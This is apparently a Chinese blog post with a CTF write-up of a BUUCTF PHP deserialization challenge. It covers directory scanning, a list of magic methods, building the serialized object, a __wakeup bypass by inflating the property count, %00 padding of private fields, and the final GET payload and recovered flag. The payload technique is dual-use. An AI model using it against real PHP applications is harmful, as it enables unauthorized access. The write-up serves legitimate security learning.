PHP序列化与反序列化

最新推荐文章于 2023-01-09 12:14:55 发布
最新推荐文章于 2023-01-09 12:14:55 发布
阅读量263 收藏 1
点赞数
分类专栏: CTF Web 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51927659/article/details/116862788
版权
CTF 同时被 2 个专栏收录
14 篇文章 2 订阅
订阅专栏
Web
14 篇文章 2 订阅
订阅专栏

PHP序列化与反序列化

参考文献:浅谈反序列漏洞

1、目录扫描,使用目录扫描工具dirsearch,扫出来一个www.zip的文件,download。

python dirsearch.py -u http://fd524dc7-eca6-4d21-b9c6-f168d37e3951.node3.buuoj.cn/ -e * -w db/dir.txt

2、查看flag.php,发现是个假的flag,因此查看index.php,查看其中的php代码,发现是文件包含的时候,进行了反序列化的过程,传入一个select的参数,进行反序列化的过程

在这里插入图片描述

3、查看class.php,代码审计,我们要调用到__destruct()并且password=100,username=admin才能echo $flag

在这里插入图片描述

魔法函数
通常来说有一些PHP的魔法函数会导致反序列化漏洞,如:
__construct 当一个对象创建时自动调用

__destruct 当对象被销毁时自动调用 (php绝大多数情况下会自动调用销毁对象)
__sleep() 使**用serialize()**函数时触发

__wakeup 使**用unserialse()**函数时会自动调用
__toString 当一个对象被当作一个字符串被调用。

__call() 在对象上下文中调用不可访问的方法时触发
__callStatic() 在静态上下文中调用不可访问的方法时触发

__get() 用于从不可访问的属性读取数据//调用私有属性时使用
__set() 用于将数据写入不可访问的属性

__isset() 在不可访问的属性上调用isset()或empty()触发
__unset() 在不可访问的属性上使用unset()时触发

__toString() 把类当作字符串使用时触发,返回值需要为字符串
__invoke() 当脚本尝试将对象调用为函数时触发

4、构造test.php代码,即可得到序列化的结果。

<?php

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

}
$a = new Name('admin',100);
$b = serialize($a);
echo $b;
?>

5、序列化后,运行apache服务器,在本地执行test.php得到结果。

在反序列化的时候会首先执行__wakeup()魔术方法,但是这个方法会把我们的username重新赋值,所以我们要考虑的就是怎么跳过__wakeup(),而去执行__destruct

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

在这里插入图片描述

6、绕过__wakeup这个魔术函数,利用反序列化漏洞,当序列化字符串中表示对象属性个数的值大于真实的属性个数时会绕过__wakeup的执行

__wakeup()方法

作用:

与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。

绕过:

反序列化字符串,当属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。

本题中,wakeup方法会导致username成为guest,因此需要通过改序列化字符串中对象的个数来绕过该方法。

name后面的2,代表类中有2个属性,但如果我们把2改成3,就会绕过__wakeup()函数。

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

7、又因为这个声明变量是private,private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上0的前缀。字符串长度也包括所加前缀的长度

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

8、使用GET请求,把准备好的序列化作为select的参数传入,然后url识别不了",改为%22

%00 
不可见的空字符(Null) ASCII码十进制为0

%20
空格

/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

9、得到flag:flag{b46c16d0-eb8d-4bca-a4ac-a9737a7f9d50

10、拓展:为什么要写%00Name%00username这样的形式?

只有public修饰的不用太多的修饰原生态构造就好

private需要加**%00Name%00**,

protected则需要使用 %00*%00username这样的方式

protected修饰变量,运行后回显代码内注释内容

<?php
class Name{
	protected $username = 'nonono';看这两行
	protected $password = 'yesyes';
	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//运行会输出 O:4:"Name":2:{s:11:"%00*%00username";s:5:"admin";s:11:"%00*%00password";i:100;}
?>

public修饰变量,运行后回显代码内注释内容

<?php
class Name{
	public $username = 'nonono';
	public $password = 'yesyes';
	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}
?>

private修饰变量,运行后回显代码内注释内容

<?php
class Name{
	private $username = 'nonono';
	private $password = 'yesyes';
	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00 password";i:100;}
?>
lunan0320
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP中的序列化反序列化
sinat_35161044的博客
08-20 2008
今天在学习面向对象时,里边的一个两个魔术方法__sleep()和__wake()让我一开始有点困惑,这两个方法分别是让类序列化反序列化时使用的,因为看的是视频,老师说的很笼统,就自己在网上查了一下,下边是我总结的内容: 1.序列化是将对象通过一系列的操作转化为字符串的过程。 2.什么时候需要序列化? 1)对象在网络上传输时 2)对象保存到文件中时 3.序列化与__sleep()魔法方法...
序列化反序列化PHP
m0_61869253的博客
08-23 83
序列化:把对象转换为字节序列的过程称为对象的序列化反序列化:把字节序列恢复为对象的过程称为对象的反序列化。对象的持久化(将对象内容保存到数据库或文件中)远程数据传输(将对象发送给其他计算机系统)序列化序列化主要解决的是数据的一致性问题。简单来说,就是输入数据与输出数据是一样的。对于数据的本地持久化,只需要将数据转换为字符串进行保存即可是实现,但对于远程的数据传输,由于操作系统,硬件等差异,会出现内存大小端,内存对齐等问题,导致接收端无法正确解析数据,为了解决这种问题。
CTF-PHP反序列化
m0_65336233的博客
10-18 1259
CTF-PHP反序列化
PHP序列化反序列化
Sapphire521的博客
01-09 253
我们在开发的过程中常常遇到需要把对象或者数组进行序列号存储,反序列化输出的情况。特别是当需要把数组存储到mysql数据库中时,我们时常需要将数组进行序列号操作。 序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode。
PHP OOP 对象的序列化 反序列化
yhwcool的博客
08-20 1152
基本介绍   所谓的对象序列化是指:将一个对象转化成一个字符串,这个字符串包括 属性 属性名,属性值,属性类型,和该对象对应的类名。简单的说明就是把一个对象的书和数据类型转成字符串; &lt;?php header("content-type:text/html;charset=utf-8"); class Cat { public $name; public $age; ...
64-64.渗透测试-PHP序列化反序列化.mp4
最新发布
05-10
64-64.渗透测试-PHP序列化反序列化.mp4
详解PHP序列化反序列化原理
10-18
本篇文章给大家分享了下PHP反序列化漏洞系列之PHP序列化反序列化原理的相关知识,有这方面需要的朋友参考学习下吧。
php json与xml序列化/反序列化
10-26
在WEB开发中,php对象的序列化反序列化经常使用,比较主流的有json格式与xml格式的序列化反序列化。今天我们就来看看是如何用的。
php序列化反序列化详解
01-20
把复杂的数据类型压缩到一个字符串中 serialize() 把变量和它们的值编码成文本形式 unserialize() 恢复原先变量 eg: $stooges = array('Moe','Larry','Curly'); $new = serialize($stooges); print_r($new);...
PHP序列化反序列化函数
编程不过是一门失传艺术的别名,这门艺术的名字叫做“思考”
11-30 2268
serialize() 把变量和它们的值编码成文本形式,即产生一个可存储的值的表示 unserialize() 恢复原先变量。
phpsession反序列化选择器漏洞造成命令执行
热门推荐
Love&Share
10-21 1万+
PHP三种session序列化选择器 ​ 首先了解下php session的三种存储方式,php中的session中的内容并不是放在内存中的,而是以文件的方式来存储的,存储方式就是由配置项session.save_handler来进行确定的,默认是以文件的方式存储。 存储的文件是以sess_sessionid来进行命名的,文件的内容就是session值的序列话之后的内容。 在php.ini中存在三项配置项: session.save_path=""–设置session的存储路径 session.save_
php反序列化数据库,php反序列化利用
weixin_31865183的博客
03-09 262
一、简介为了有效地存储或传递数据,同时不丢失其类型和结构,持久化对象,经常需要利用序列化反序列化函数对数据进行处理。重点在于解决php对象传递和存储的问题。1、序列化反序列化序列化函数将各种类型的数据压缩为字符串,该字符串可以存储于任何地方。反序列化函数将可传输的包含字节流的字符串转换回原来的值。2、php中常使用的序列化反序列化函数serialize()unserialize()json_...
PHP反序列化
qq_46430168的博客
07-02 1505
一.序列化反序列化    1. 序列化(serialize):是将变量或对象转换成字符串的过程。从而达到传输和存储的目的。 class S { public $test=“pikachu”; } s=newS();//创建一个对象serialize(s=new S(); //创建一个对象 serialize(s=newS();//创建一个对象serialize(s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:“S”:1:{s:4:“tes
php+反序列化代码执行漏洞,PHP反序列化漏洞
weixin_30444517的博客
03-11 270
0x001 漏洞产生原理在反序列化的过程中自动触发了某些魔术方法。未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致XSS、代码执行、文件写入、文件读取等不可控后果。0x002 漏洞触发条件一般只能通过代码审计的方式挖掘该漏洞,寻找代码中unserialize()函数的变量可控,且PHP文件代码中存在可利用的类,同时类中具有魔术方法。0x003 PHP魔术方法__cons...
笔记:理解PHP数组的序列化反序列化
闲聊的互联网
11-01 4757
 当我们想要将数组值存储到数据库时,就可以对数组进行序列化操作,然后将序列化后的值存储到数据库中。其实PHP序列化数组就是将复杂的数组数据类型转换为字符串,方便数组存库操作。对PHP数组进行序列化反序列化操作,主要就用到两个函数,serialize和unserialize。 一、PHP数组序列化:serialize $arr = array('PHP','Java','Python','...
PHP反序列化笔记
CC__LL__CC的博客
03-13 554
一、反序列化漏洞 1.序列化是指将对象的状态信息转化为可存储或可传输的过程,反序列化序列化的逆过程,其目的是方便数据传输。 2.PHP序列化举例: 例如:序列化前的对象为 <?php class person{ public $name; public $age=19; public $sex; ?> 通过serialize()函数序列化后: ![在这里插入图片描述](https://img-blog.csdnimg.cn/3ba15157ce344e45ba7ac0b46b21cc1
PHP反序列化&魔术方法
weixin_54882883的博客
06-17 889
php反序列化
序列化serialize()与反序列化unserialize()的实例
weixin_34138521的博客
09-10 786
在写序列化serialize与反序列化unserialize()时,我们先来看看: serialize — 产生一个可存储的值的表示 描述 string serialize ( mixed $value ) serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。 这有利于存储或传递 PHP 的...
php序列化反序列化
07-29
- *1* *2* *3* [PHP序列化反序列化](https://blog.csdn.net/weixin_44033675/article/details/116809651)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值